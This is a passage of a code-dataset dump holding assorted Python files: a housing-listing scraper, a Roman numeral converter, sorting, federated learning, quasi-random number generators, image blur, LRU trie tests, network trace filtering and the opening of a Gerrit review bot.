href.*?面积(.*?)平米.*?</li>.*?年代(.*?)年.*?</li>.*?朝向(.*?)</li>.*?楼层.*?</b>(.*?)\\/(.*?)层/*?</li>.*?小区(.*?)<span>.*?小区成交记录(.*?)</a>.*?经纪人房评(.*?)</a>.*?客户看房数(.*?)</b>.*?<dl class=\"house-broker-info\">.*?<p class=\"mr-t ers-xing\">(.*?)</span>.*?</p>.*?<p class=\"house-broker-tel\">(.*?)<a class=\"broker-wx-icon\".*?年限(.*?)年.*?所属门店.*?<a title=\"(.*?)\".*?本房源带看次数(.*?)次.*?<p class=\"house-code\">.*?<span>.*?房源编号(.*?)</span>',\n re.S\n )\n #initialization\n dict = {}\n #field legend:\n # 'listing URL'=urlsite, 'asking price'=price, 'bedrooms'=bedrm, 'living rooms'=hall, 'bathrooms'=bathrm, 'unit price'=unit_price, 'floor area'=area, 'build year'=house_age, 'orientation'=orient, 'floor'=floor, 'total floors'=tol_floor, 'estate name'=block_name, 'estate transaction count'=block_volume, 'agent review count'=eval_volume, 'listing viewing count'=see_volume, 'agent name'=maint_name, 'agent phone'=maint_tel, 'agent years in business'=wok_time, 'agent store'=maint_store, 'agent viewings of this listing'=self_see, 'listing ID'=house_id\n fields = ['price', 'bedrm', 'hall', 'bathrm', 'unit_price', 'area', 'house_age', 'orient', 'floor', 'tol_floor', 'block_name', 'block_volume', 'eval_volume', 'see_volume', 'maint_name', 'maint_tel', 'wok_time','maint_store','self_see', 'house_id']\n #index of the (j+1)-th second-level link\n j=0\n for content in secondcontent:\n try:\n items=re.findall(pattern,content)\n if items:\n dict['pt']=time.strftime('%Y%m%d')\n dict['urlsite']=secondurl[j]\n i=0\n while i < len(items[0]):\n temp = self.Tool.replace(items[0][i])\n dict[fields[i]] = temp\n i+=1\n j+=1\n self.mysql.insert('5i5jhousedel',dict)\n else:break\n except re.error as e:\n print(self.getCurrentTime(),'Regex match error, reason: %d %s'%(e.args[0],e.args[1]))\n return 1\n\n # # main function\n # def main(self,):\n #\n # print(self.getCurrentTime(),'Web-Crawler Starts')\n # #open/create the log file\n # log_file=open('crawler.log','w')\n # #redirect stdout\n # sys.stdout=log_file\n\n\n#main function\ndef main():\n a=Spider()\n x=1\n while x<1000:\n try:\n with open('d:\\\\data\\\\page.txt','r+',encoding='utf-8') as p:\n temp=int(p.readline().strip())\n if temp!=x:\n x=temp\n result=a.getSecondContentClear(x)\n # print(result)\n x+=1\n if not result:\n with open('d:\\\\data\\\\page.txt', 'w', encoding='utf-8') as p:\n p.write(str(1))\n break\n except:pass\n\n#check whether the page-progress file exists\nif not os.path.exists('d:\\\\data\\\\page.txt'):\n with open('d:\\\\data\\\\page.txt', 'w', encoding='utf-8') as z:\n z.write(str(1))\n\ncount = 0\n#crawl 3 times to catch anything missed\nwhile count<3:\n main()\n count+=1\n","sub_path":"Tj5i5j.py","file_name":"Tj5i5j.py","file_ext":"py","file_size_in_byte":9821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"432099630","text":"\n# http://www.pyug.at/PythonQuiz/2012-03\n# <m@thp.io>'s solution, variant 2\n\nimport fileinput\nimport functools\nimport operator\n\na = [((1+4*(i%2))*10**(i//2), c) for i, c in enumerate('IVXLCDM')]\ns = [(a[x+1][0]-a[x//2*2][0], a[x//2*2][1]+a[x+1][1]) for x in range(6)]\n\ndef convert(x):\n n = x.isdigit()\n if n: x = int(x)\n for av, rv in sorted(a+s, reverse=True):\n while (n and x >= av) or (not n and x.startswith(rv)):\n yield (rv if n else av)\n x = ((x - av) if n else x[len(rv):])\n\nfor line in filter(None, map(lambda x: x.strip(), fileinput.input())):\n print(functools.reduce(operator.add, convert(line)))\n\n","sub_path":"2012-03/pyquiz_2012-03_thp2.py","file_name":"pyquiz_2012-03_thp2.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"112670458","text":"def selectionsort(list1):\r\n ind_ak = len(list1)-1\r\n while (ind_ak>=1):\r\n ind_aw = 0\r\n maximum = ind_aw\r\n ind_aw = ind_aw + 1\r\n while (ind_aw <= ind_ak):\r\n if 
(list1[ind_aw] > list1[maximum]):\r\n maximum = ind_aw\r\n ind_aw = ind_aw + 1\r\n temp = list1[ind_ak]\r\n list1[ind_ak] = list1[maximum]\r\n list1[maximum] = temp\r\n ind_ak = ind_ak - 1\r\n\r\nlist1 = [54,26,93,17,77,31,44,55,20]\r\nselectionsort(list1)\r\nprint (list1)\r\n \r\n","sub_path":"Sorting/Selection Sort (Our Logic).py","file_name":"Selection Sort (Our Logic).py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"378606235","text":"from enum import Enum\nimport numpy as np\nimport tensorflow as tf\n\nfrom shfl.federated_government.federated_government import FederatedGovernment\nfrom shfl.federated_aggregator.fedavg_aggregator import FedAvgAggregator\nfrom shfl.data_distribution.data_distribution_iid import IidDataDistribution\nfrom shfl.model.deep_learning_model import DeepLearningModel\nfrom shfl.data_base.emnist import Emnist\nfrom shfl.data_base.fashion_mnist import FashionMnist\n\n\nclass FederatedImagesClassifier(FederatedGovernment):\n \"\"\"Runs a federated image classification with minimal user input.\n\n It overrides the class [FederatedGovernment](./#federatedgovernment-class).\n\n Runs an image classification federated learning experiment\n with predefined values. This way, it suffices to just specify\n which dataset to use.\n\n # Arguments:\n data_base_name_key: Key of a valid data base (see possibilities in class\n [ImagesDataBases](./#imagesdatabases-class)).\n data_distribution: Optional; Reference to the object defining the data sampling.\n Options are\n [IidDataDistribution](../data_distribution/#iiddatadistribution-class) (default)\n and [NonIidDataDistribution](../data_distribution/#noniiddatadistribution-class).\n num_nodes: Optional; number of client nodes (default is 20).\n percent: Optional; Percentage of the database to distribute\n among nodes (by default set to 100, in which case\n all the available data is used).\n \"\"\"\n\n def __init__(self, data_base_name_key,\n data_distribution=IidDataDistribution,\n num_nodes=20, percent=100):\n if data_base_name_key in ImagesDataBases.__members__.keys():\n\n data_base = ImagesDataBases[data_base_name_key].value()\n data_base.load_data()\n train_data, _ = data_base.train\n\n federated_data, self._test_data, self._test_labels = \\\n data_distribution(data_base).get_nodes_federation(\n num_nodes=num_nodes,\n percent=percent)\n\n self._test_data = np.reshape(\n self._test_data,\n (self._test_data.shape[0],\n self._test_data.shape[1],\n self._test_data.shape[2], 1))\n\n federated_data.apply_data_transformation(reshape_query)\n mean = np.mean(train_data.data)\n std = np.std(train_data.data)\n federated_data.apply_data_transformation(normalize_query, mean=mean, std=std)\n\n aggregator = FedAvgAggregator()\n\n super().__init__(self.model_builder(), federated_data, aggregator)\n\n else:\n raise ValueError(\"The data base \" + data_base_name_key +\n \" is not included. 
Try with: \" +\n str(\", \".join([e.name for e in ImagesDataBases])))\n\n def run_rounds(self, n_rounds=5, **kwargs):\n \"\"\"See base class.\n \"\"\"\n super().run_rounds(n_rounds, self._test_data, self._test_labels, **kwargs)\n\n @staticmethod\n def model_builder():\n \"\"\"Creates a Tensorflow model for image classification.\n\n # Returns:\n model: Object of class\n [DeepLearningModel](../model/supervised/#deeplearningmodel),\n the Tensorflow model to use.\n \"\"\"\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Conv2D(\n 32, kernel_size=(3, 3), padding='same',\n activation='relu', strides=1, input_shape=(28, 28, 1)))\n model.add(tf.keras.layers.MaxPooling2D(\n pool_size=2, strides=2, padding='valid'))\n model.add(tf.keras.layers.Dropout(0.4))\n model.add(tf.keras.layers.Conv2D(\n 32, kernel_size=(3, 3), padding='same',\n activation='relu', strides=1))\n model.add(tf.keras.layers.MaxPooling2D(\n pool_size=2, strides=2, padding='valid'))\n model.add(tf.keras.layers.Dropout(0.3))\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(128, activation='relu'))\n model.add(tf.keras.layers.Dropout(0.1))\n model.add(tf.keras.layers.Dense(64, activation='relu'))\n model.add(tf.keras.layers.Dense(10, activation='softmax'))\n\n criterion = tf.keras.losses.CategoricalCrossentropy()\n optimizer = tf.keras.optimizers.RMSprop()\n metrics = [tf.keras.metrics.CategoricalAccuracy()]\n\n return DeepLearningModel(model=model, loss=criterion,\n optimizer=optimizer, metrics=metrics)\n\n\ndef reshape_query(data):\n \"\"\"Reshapes the data in the set of federated nodes.\"\"\"\n data.data = np.reshape(\n data.data,\n (data.data.shape[0],\n data.data.shape[1],\n data.data.shape[2], 1))\n\n\ndef normalize_query(data, mean, std):\n \"\"\"Applies a normalization over the input data.\"\"\"\n data.data = (data.data - mean) / std\n\n\nclass ImagesDataBases(Enum):\n \"\"\"Enumerates the available databases for image classification.\n\n Options are: `\"EMNIST\", \"FASHION_EMNIST\"`.\n \"\"\"\n EMNIST = Emnist\n FASHION_EMNIST = FashionMnist\n","sub_path":"shfl/federated_government/federated_images_classifier.py","file_name":"federated_images_classifier.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"4542396","text":"import numpy as np\nfrom efficientmc.utils import timecached, DateCache\nimport sobol_seq\nimport ghalton as gh\nfrom scipy.stats import norm\nfrom math import ceil, fmod, floor, log\n\nclass GaussianGenerator:\n \"Générateur de bruits gaussiens corrélés.\"\n\n def __init__(self, nsims, corrmatrix, corrkeys, randomfunc):\n \"\"\"\n Initialise une nouvelle instance de la classe `GaussianGenerator`.\n\n Paramètres :\n ------------\n nsims : entier positif\n Nombre de simulations à générer.\n corrmatrix : matrice carrée\n Matrice de corrélation entre les différents bruits gaussiens\n à simuler. La matrice doit être définie positive.\n corrkeys\n Liste des identifiants associés aux différentes lignes / colonnes\n de la matrice de corrélation `corrmatrix`. 
Les identifiants doivent\n être donnés dans l'ordre dans lequel les bruits correspondants\n apparaissent dans `corrmatrix`.\n randomfunc\n Fonction permettant de générer des bruits gaussiens indépendants\n (typiquement `np.random.randn`).\n \"\"\"\n self.corrmatrix = corrmatrix\n self.corrkeys = corrkeys\n self.nsims = nsims\n self.randomfunc = randomfunc\n self.cache = DateCache()\n try:\n np.linalg.cholesky(self.corrmatrix)\n except np.linalg.LinAlgError:\n raise np.linalg.LinAlgError(\"the correlation matrix is not \"\\\n \"positive definite.\") from None\n\n @property\n def nnoises(self):\n \"Nombre de bruits gaussiens distincts à simuler.\"\n return self.corrmatrix.shape[0]\n\n @timecached\n def getallnoises(self, date):\n \"\"\"\n Renvoie `self.nsims` réalisations de `self.nnoises` bruits\n gaussiens corrélés.\n \"\"\"\n whitenoises = self.randomfunc(self.nnoises, self.nsims)\n noises = np.dot(np.linalg.cholesky(self.corrmatrix), whitenoises)\n return noises\n\n @timecached\n def getnoises(self, date, keys):\n \"\"\"\n Renvoie un tableau de taille `(len(keys), self.nsims)` de bruits\n gaussiens corrélés correspondants aux aléas identifiés par les\n clefs `keys`.\n \"\"\"\n noises = self.getallnoises(date)\n res = np.empty((len(keys), self.nsims))\n for idx, key in enumerate(keys):\n keyidx = self.corrkeys.index(key)\n res[idx, :] = noises[keyidx, :]\n return res\n\ndef antithetic_randn(nnoises, nsims):\n \"\"\"\n Renvoie un tableau de bruits gaussiens non corrélés :math:`(G_{_i,j})`\n de taille `(nnoises, nsims)`, et tel que, pour tout :math:`i` :\n :math:`\\forall 1 \\leq j \\leq n / 2, G_{i,n/2+j} = -G_{i,j}`\n\n Paramètres :\n ------------\n nnoises : entier positif\n Nombre de bruits à simuler.\n nsims : entier positif, pair\n Nombre de simulations à effectuer par prix.\n \"\"\"\n if nsims % 2 != 0:\n raise ValueError(\"the number of simulations used with antithetic \"\\\n \"variables should be even.\")\n half = int(0.5 * nsims)\n noises = np.empty((nnoises,nsims))\n noises[:, :half] = np.random.randn(nnoises, half)\n noises[:, half:] = -noises[:, :half]\n return noises\n\ndef vdc(n, base):\n \"\"\"\n Cette fonction permet de calculer le n-ieme nombre de la base b de la \n séquence de Van Der Corput\n \"\"\"\n vdc, denom = 0,1\n while n:\n denom *= base\n n, remainder = divmod(n, base)\n vdc += remainder / denom\n return norm.ppf(vdc)\ndef van_der_corput(nsims,b):\n \"\"\"\n Cette fonction permet de générer la séquence de Van Der Corput en base b\n \"\"\"\n array=np.empty(nsims)\n i=0\n for i in range(nsims):\n array[i]=vdc(i,b)\n return array\n\ndef van_der_corput_dimension(dim,nsims):\n array=np.empty((dim,nsims))\n \"\"\"\n Cette fonction génère dans un tableau de taille (dim,nsims) toutes les séquences\n de la suite de Van der Corput de la base 2 à la base dim+2\n \"\"\"\n for i in range(2,dim+2,1):\n array[i-2,:]=van_der_corput(nsims, i)\n return array\n\ndef halton(dim,nsims):\n \"\"\"\n Attention: la fonction crash pour nsims>500, on doit revoir l'optimisation de la fonction\n \n On utilise la librairie Python existante sur la suite de Halton\n \n GeneralizedHalton produit une suite de nsims dimension (colonnes),\n le nombre 68 est utilisé pour faire des permutations, c'est le nombre qui permet de se rapprocher\n le plus des valeurs du Monte Carlo classique\n \"\"\"\n sequence = gh.GeneralizedHalton(nsims,68)\n \"Une liste de dim sous-listes est produite\"\n points=sequence.get(dim)\n \"Pour lire la liste dans une matrice à plusieurs dimensions (dim,nsims)\"\n 
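For intuition, the base-b radical inverse that vdc computes (before the norm.ppf transform) starts 0.5, 0.25, 0.75, 0.125, ... in base 2; a tiny standalone check of that step, independent of the module above:

def radical_inverse(n, base=2):
    # digit-reversal of n in the given base, mapped into [0, 1)
    v, denom = 0.0, 1
    while n:
        denom *= base
        n, rem = divmod(n, base)
        v += rem / denom
    return v

print([radical_inverse(n) for n in range(1, 5)])  # [0.5, 0.25, 0.75, 0.125]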
data=np.array(norm.ppf(points))\n shape=(dim,nsims)\n return data.reshape(shape)\n\ndef sobol(nnoises,nsims):\n \"\"\"\n Renvoie un tableau de valeurs générés par la suite de Sobol\n de taille (nnoises,nsims)\n \"\"\"\n noises = np.empty((nsims))\n # Utilisation de la fonction sobol_seq.i4_sobol_generate_std_normal\n # pour générer des variables quasi-aléatoires suivant une loi normale.\n noises = sobol_seq.i4_sobol_generate_std_normal(nnoises, nsims)\n return noises.reshape(nnoises, nsims)\n\ndef halton2(dim, nsims):\n \"\"\"\n la fonction ne crash plus. \n Version 2 de la suite d'halton sans la librairie Python existante.\n \"\"\"\n h = np.empty(nsims * dim)\n h.fill(np.nan)\n p = np.empty(nsims)\n p.fill(np.nan)\n Base = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]\n lognsims = log(nsims + 1)\n for i in range(dim):\n base = Base[i]\n n = int(ceil(lognsims / log(base)))\n for t in range(n):\n p[t] = pow(base, -(t + 1) )\n for j in range(nsims):\n d = j + 1\n somme = fmod(d, base) * p[0]\n for t in range(1, n):\n d = floor(d / base)\n somme += fmod(d, base) * p[t]\n\n h[j*dim + i] = somme\n\n return norm.ppf(h.reshape(dim, nsims))\n","sub_path":"efficientmc/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"423460735","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 23 12:11:45 2021\r\n\r\n@author: Juan Carlos\r\n\"\"\"\r\ndef badFun(n):\r\n try:\r\n return n / 0\r\n except:\r\n print(\"Error en cualquier parte\")\r\n raise \r\ntry:\r\n badFun(0)\r\nexcept ArithmeticError:\r\n print(\"Error lanzado por raise\")\r\nprint(\"THE END.\")\r\n","sub_path":"raise.py","file_name":"raise.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"20721398","text":"import math\nimport numpy as np\nfrom numba import jit\n\n\n@jit\ndef cal_blur(imgarray, theta, delta, L, S=0):\n imgheight = imgarray.shape[0]\n imgwidth = imgarray.shape[1]\n c0 = int(imgheight / 2)\n c1 = int(imgwidth / 2)\n theta = theta / 180 * math.pi\n delta = delta / 180 * math.pi\n blurred_imgarray = np.copy(imgarray)\n for x in range(0, imgheight):\n for y in range(0, imgwidth):\n R = math.sqrt((x - c0) ** 2 + (y - c1) ** 2)\n alpha = math.atan2(y - c1, x - c0)\n X_cos = L * math.cos(delta) - S * R * math.cos(alpha)\n Y_sin = L * math.sin(delta) - S * R * math.sin(alpha)\n N = int(\n max(\n abs(R * math.cos(alpha + theta) + X_cos + c0 - x),\n abs(R * math.sin(alpha + theta) + Y_sin + c1 - y),\n )\n )\n if N <= 0:\n continue\n count = 0\n sum_r, sum_g, sum_b = 0, 0, 0\n for i in range(0, N + 1):\n n = i / N\n xt = int(R * math.cos(alpha + n * theta) + n * X_cos + c0)\n yt = int(R * math.sin(alpha + n * theta) + n * Y_sin + c1)\n if xt < 0 or xt >= imgheight:\n continue\n elif yt < 0 or yt >= imgwidth:\n continue\n else:\n sum_r += imgarray[xt, yt][0]\n sum_g += imgarray[xt, yt][1]\n sum_b += imgarray[xt, yt][2]\n count += 1\n blurred_imgarray[x, y] = np.array(\n [sum_r / count, sum_g / count, sum_b / count]\n )\n return blurred_imgarray\n","sub_path":"blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"537134951","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# =============================================================================\n# Ural LRUTrie Unit 
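A standalone sketch of the Cholesky trick used by getallnoises above to correlate white noise; the 0.8 correlation and the sample count are illustrative values, not from the original code:

import numpy as np

corr = np.array([[1.0, 0.8],
                 [0.8, 1.0]])           # must be positive definite
L = np.linalg.cholesky(corr)
white = np.random.randn(2, 100000)      # independent N(0, 1) noises
correlated = L @ white                  # rows are now correlated
print(np.corrcoef(correlated)[0, 1])    # close to 0.8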
Tests\n# =============================================================================\nfrom ural.lru import LRUTrie, NormalizedLRUTrie\n\n\nclass TestNormalizedLRUTrie(object):\n def test_lru_trie(self):\n trie = LRUTrie()\n\n trie.set(\"http://lemonde.fr\", 1)\n trie.set(\"http://lemonde.fr/articles/economy\", 2)\n\n assert len(trie) == 2\n\n assert list(trie) == [1, 2]\n\n assert trie.match(\"http://lefigaro.fr\") is None\n assert trie.match(\"http://lemonde.fr/categories/whatever\") == 1\n assert trie.match(\"http://lemonde.fr/articles/economy/index.html\") == 2\n\n trie.set_lru([\"s:http\", \"h:fr\", \"h:lefigaro\"], 3)\n trie.set_lru(\"s:http|h:fr|h:lefigaro|p:articles|p:whatever.html|\", 4)\n\n assert len(trie) == 4\n\n assert trie.match_lru([\"s:http\", \"h:fr\", \"h:lefigaro\", \"p:test\"]) == 3\n assert trie.match_lru(\"s:http|h:fr|h:lefigaro|p:articles|p:whatever.html|\") == 4\n\n def test_normalized_lru_trie(self):\n trie = NormalizedLRUTrie()\n trie.set(\"http://www.lemonde.fr\", {\"media\": \"lemonde\"})\n trie.set(\n \"http://www.lemonde.fr/politique/article\",\n {\"media\": \"lemonde\", \"type\": \"article\"},\n )\n assert trie.match(\"http://www.lemonde.fr\") == {\"media\": \"lemonde\"}\n assert trie.match(\"http://www.lemonde.fr/politique/\") == {\"media\": \"lemonde\"}\n assert trie.match(\"http://www.lemonde.fr/politique/article\") == {\n \"media\": \"lemonde\",\n \"type\": \"article\",\n }\n assert trie.match(\"http://www.lemonde.fr/politique/article/randompath\") == {\n \"media\": \"lemonde\",\n \"type\": \"article\",\n }\n assert trie.match(\"http://www.legorafi.fr\") is None\n\n assert len(trie) == 2\n\n assert list(trie) == [\n {\"media\": \"lemonde\"},\n {\"media\": \"lemonde\", \"type\": \"article\"},\n ]\n\n def test_edge_cases(self):\n trie = LRUTrie()\n\n assert (\n trie.match(\n \"http://127.0.0.1/economie/2019/01/08/un-journaliste-poursuit-richard-ferrand-pour-lavoir-bloque-sur-twitter/\"\n )\n is None\n )\n\n def test_trailing_path(self):\n trie = LRUTrie()\n\n trie.set(\"http://www.zejournal.mobi/\", \"Ze Journal mobi\")\n\n assert (\n trie.match(\"http://www.zejournal.mobi/id/news/show_detail/14853\")\n == \"Ze Journal mobi\"\n )\n","sub_path":"test/lru_trie_test.py","file_name":"lru_trie_test.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"133765391","text":"\"\"\"\nThis program has been written for exercise 1\nof the Advanced Operating System course, instructed\nby Dr. 
Hedieh Sajedi\nStudent:Abdolnabi Zameni\nDate: 13 Azar 1399\n\"\"\"\n#importing the threading module\nimport threading\n\ndef print_random_value(step):\n \"\"\"\n Function to print the given num step to output\n \"\"\"\n ordinal_numbers = {1: \"st\",\n 2: \"nd\",\n 3: \"rd\",\n 4: \"th\"\n }\n\n print(format(step)+(ordinal_numbers.get(step,False) or ordinal_numbers[4] )+\" thread output is: {}\".format(step))\n\n\n\n\nif __name__ == \"__main__\":\n\n LCL = int(input(\"Starting value to display [enter to set default 1]:\") or 1)\n UCL = int(input(\"Ending value to display [enter to set default 9]:\") or 9) + 1\n #loop over the range of 1 to 10, to create totally 9 threads displaying from 1 to 9\n for i in range(LCL,UCL):\n # creating a working thread\n working_thread = threading.Thread(target=print_random_value, args=(i,))\n # starting the working thread\n working_thread.start()\n # If you want to wait until the working thread is completely executed uncomment next line\n # working_thread.join()\n\n # If you want to know when the program finished running all of the threads completely uncomment next line.\n # Note: If you keep the working_thread.join() commented you may see the \"Done!\" message before all of the threads\n # completed successfully.\n # print(\"\\nDone!\")","sub_path":"AOS/threading_exercise.py","file_name":"threading_exercise.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"239180269","text":"import re, sys\n\ndef fixURL(line):\n urlMatch = re.search('\"(.*)\"', line)\n if urlMatch:\n url = urlMatch.group(1)\n displayUrl = url.replace('http://', '').replace('https://', '').replace('www.', '')\n if '@' in url:\n url = 'mailto:'+url\n\n return line[:urlMatch.start()] + '<a href=\"' + url + '\">' + displayUrl + '</a>' + line[urlMatch.end():]\n else:\n return line\n\ndef fixSpecialHTML(line):\n specialMatch = re.search('{{(.*)}}', line) \n if specialMatch:\n specialName = specialMatch.group(1)\n return line[:specialMatch.start()] + '<span class=\"special\" id=\"' + specialName + '\">' + specialName + '</span>' + line[specialMatch.end():]\n else:\n return line\n\ndef addLineNumber(line, lineNum):\n if lineNum < 10:\n lineNum = ' '+str(lineNum)\n return '<tr><td class=\"gutterText\">'+str(lineNum)+'</td><td class=\"code\"><pre>'+line+'</pre></td></tr>'\n\ndef fixLine(line, lineNum):\n line = fixURL(line)\n line = fixSpecialHTML(line)\n line = addLineNumber(line, lineNum)\n return line\n\ndef rlcomFormat(inPath, outPath):\n inFile = open(inPath, 'r')\n outFile = open(outPath, 'w')\n\n lineNum = 1\n for line in inFile:\n outFile.write(fixLine(line, lineNum))\n lineNum += 1\n \n inFile.close()\n outFile.close()\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print('Usage: format.py <inpath> <outpath>')\n else:\n rlcomFormat(sys.argv[1], sys.argv[2])\n","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"225322768","text":"import re\n\n\ndef writeline(line):\n try:\n tclfile = open(\"beijing3pmfilterspeed500.tcl\",\"a\")\n tclfile.writelines(line)\n finally:\n\n if tclfile:\n tclfile.close()\n\n\ndef getspeed(x2, y2, x1, y1, t2, t1):\n return int((abs(x2 - x1) + abs(y2 - y1)) / (t2 - t1))\n\n\ndef gettime(line):\n pattere = re.compile(r'ns_ at [0-9]\\d*')\n match = pattere.search(line)\n if match:\n numpattern = re.compile('[0-9]\\d*')\n 
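A quick check of fixURL from format.py above, assuming the function is importable; the input line here is made up for illustration:

line = 'contact me at "https://www.example.com/about"'
print(fixURL(line))
# -> contact me at <a href="https://www.example.com/about">example.com/about</a>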
nummatch = numpattern.search(match.group())\n time = nummatch.group()\n return int(time)\n else:\n return -666\n\n\ndef getxy(line):\n pattere = re.compile(r'setdest [0-9]\\d* [0-9]\\d*')\n match = pattere.search(line)\n if match:\n numpattern = re.compile('[0-9]\\d*')\n nummatch = numpattern.findall(match.group())\n y = nummatch.pop()\n x = nummatch.pop()\n xy = list()\n xy.append(y)\n xy.append(x)\n return xy\n else:\n return -666\n\n\nclass Node:\n def __init__(self, id, speed, times):\n self.id = id\n self.speed = speed\n self.times = times\n def __repr__(self):\n return repr((self.id, self.speed, self.times))\n\n\ndef speedset(filename):\n with open(filename) as f:\n content = f.readlines()\n id = -666\n nodelist = list()\n for line in content:\n xy = getxy(line)\n if xy == -666:\n # print(\"pass\")\n pass\n else:\n pattern = re.compile(r'node_\\([0-9]\\d*')\n match = pattern.search(line)\n if match:\n idpattern = re.compile('[0-9]\\d*')\n idmatch = idpattern.search(match.group())\n idnum = int(idmatch.group())\n if id == -666:\n id = idnum\n # print(id)\n # print(node.id)\n xy1 = getxy(line)\n time1 = gettime(line)\n times = 0\n # print(\"id = -666\")\n else:\n if id == idnum:\n xy2 = getxy(line)\n time2 = gettime(line)\n times = times + 1\n # print(\"id = idnum\")\n # print(\"idnum = \"+ str(idnum))\n else:\n if time2 == time1:\n # print(\"time2 = time1\")\n pass\n else:\n # print(xy2)\n # print(id)\n if len(xy2):\n x2 = xy2.pop()\n y2 = xy2.pop()\n x1 = xy1.pop()\n y1 = xy1.pop()\n # print(\"x2 =\" + x2 + \" y2 =\" + y2 + \" x1 =\" + x1 + \" y1 =\" + y1 + \" time2 =\" + str(time2) + \" time1 =\" + str(time1))\n speed = getspeed(int(x2), int(y2), int(x1), int(y1), time2, time1)\n nodelist.append(Node(id, speed, times))\n id = idnum\n time1 = gettime(line)\n xy1 = getxy(line)\n else:\n print(str(id) + \"list is empty\")\n id = -666\n print(nodelist)\n sortlist = sorted(nodelist, key=lambda node: node.speed, reverse=True)\n speedset = set()\n print(sortlist)\n num = 250\n for node in sortlist:\n speedset.add(node.id)\n print(node)\n if len(speedset) == num:\n break\n sortlistTime = sorted(nodelist, key=lambda node: node.times, reverse=True)\n for node in sortlistTime:\n if node.id not in speedset:\n speedset.add(node.id)\n print(node)\n if len(speedset) == 500:\n break\n print(speedset)\n return speedset\n\n\n# def filter(filename):\n# idset = speedset(filename)\n# print(idset)\n# with open(filename) as f:\n# content = f.readlines()\n# i = 0\n# number = -123\n# for line in content:\n# # print(line)\n# pattern = re.compile(r'node_\\([0-9]\\d*')\n# match = pattern.search(line)\n# if match:\n# # print(match.group())\n# numpattern = re.compile('[0-9]\\d*')\n# nummatch = numpattern.search(match.group())\n# num = int(nummatch.group())\n# if num in idset:\n# atpattern = re.compile(r'at [0-9]\\d*')\n# atmatch = atpattern.search(line)\n# if atmatch:\n# atnumpattern = re.compile('[0-9]\\d*')\n# atnummatch = atnumpattern.search(atmatch.group())\n# atnum = int(atnummatch.group())\n# if atnum <= 600:\n# if number == -123:\n# writeline(line.replace(match.group(), 'node_(' + str(i)))\n# number = num\n# else:\n# if number == num:\n# writeline(line.replace(match.group(), 'node_(' + str(i)))\n# else:\n# i = i + 1\n# number = num\n# writeline(line.replace(match.group(), 'node_(' + str(i)))\n# else:\n# pass\n# # print('not match')\n\ndef filter(filename):\n idset = speedset(filename)\n print(idset)\n with open(filename) as f:\n content = f.readlines()\n i = 0\n number = -123\n for line in content:\n # 
print(line)\n pattern = re.compile(r'node_\\([0-9]\\d*')\n match = pattern.search(line)\n if match:\n # print(match.group())\n numpattern = re.compile('[0-9]\\d*')\n nummatch = numpattern.search(match.group())\n num = int(nummatch.group())\n if num in idset:\n if number == -123:\n writeline(line.replace(match.group(), 'node_(' + str(i)))\n number = num\n else:\n if number == num:\n writeline(line.replace(match.group(), 'node_(' + str(i)))\n else:\n i = i + 1\n number = num\n writeline(line.replace(match.group(), 'node_(' + str(i)))\n else:\n pass\n # print('not match')\n\n\nfilter(\"beijing3pm.tcl\")\n\n","sub_path":"2019-01-28/speedfilter.py","file_name":"speedfilter.py","file_ext":"py","file_size_in_byte":6589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"216656202","text":"import tangent\n# Tangent has recipes for auto-generating derivatives for code that contains if statements and loops\n\n\ndef f(x):\n if x > 0:\n a = x ** 2.0\n else:\n a = -x\n out = a * a\n return out\n\ndfdW = tangent.grad(f, verbose=1)\nprint(dfdW)\n","sub_path":"controlFlow.py","file_name":"controlFlow.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"625277364","text":"#!/usr/bin/env python3\n\nfrom reviewer import Reviewer\nfrom gerrit import Gerrit, GerritRevision, GerritMessage\n\nfrom trollreview import ReviewType\nfrom trollreviewerfromgit import FromgitChangeReviewer\nfrom trollreviewerupstream import UpstreamChangeReviewer\nfrom trollreviewerfromlist import FromlistChangeReviewer\nfrom trollreviewerchromium import ChromiumChangeReviewer\n\nimport argparse\nimport datetime\nimport json\nimport requests\nimport sys\nimport time\n\nclass Troll(object):\n def __init__(self, url, args):\n self.url = url\n self.args = args\n self.gerrit = Gerrit(url)\n self.tag = 'autogenerated:review-o-matic'\n self.blacklist = {}\n self.stats = { str(ReviewType.SUCCESS): 0, str(ReviewType.BACKPORT): 0,\n str(ReviewType.ALTERED_UPSTREAM): 0,\n str(ReviewType.MISSING_FIELDS): 0,\n str(ReviewType.MISSING_HASH): 0,\n str(ReviewType.INVALID_HASH): 0,\n str(ReviewType.MISSING_AM): 0,\n str(ReviewType.INCORRECT_PREFIX): 0,\n 